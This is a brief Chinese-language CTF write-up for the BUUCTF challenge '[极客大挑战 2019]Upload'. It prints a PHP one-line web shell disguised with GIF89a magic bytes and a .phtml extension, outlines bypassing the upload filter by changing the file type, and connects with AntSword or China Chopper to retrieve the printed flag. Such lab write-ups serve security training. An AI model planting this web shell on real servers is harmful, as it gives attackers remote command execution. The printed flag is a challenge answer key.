BUU-WEB-[极客大挑战 2019]Upload

[极客大挑战 2019]Upload

BUU-WEB-[极客大挑战 2019]Upload_第1张图片
简单说一下思路,从题目看出来是文件上传漏洞,利用一句话木马使用蚁剑或者菜刀连接。
一句话木马为:

GIF89a? 
<script language="php">eval($_REQUEST[shell])</script>

文件后缀名为phtml

BUU-WEB-[极客大挑战 2019]Upload_第2张图片
上传的时候修改文件属性。
BUU-WEB-[极客大挑战 2019]Upload_第3张图片
找到上传的网页,利用工具连接。
BUU-WEB-[极客大挑战 2019]Upload_第4张图片
成功连接,打开终端搜寻flag。
BUU-WEB-[极客大挑战 2019]Upload_第5张图片

flag{
     69a6b539-77e8-49a3-bad7-7187d1541c59}

你可能感兴趣的:(BUU-WEB)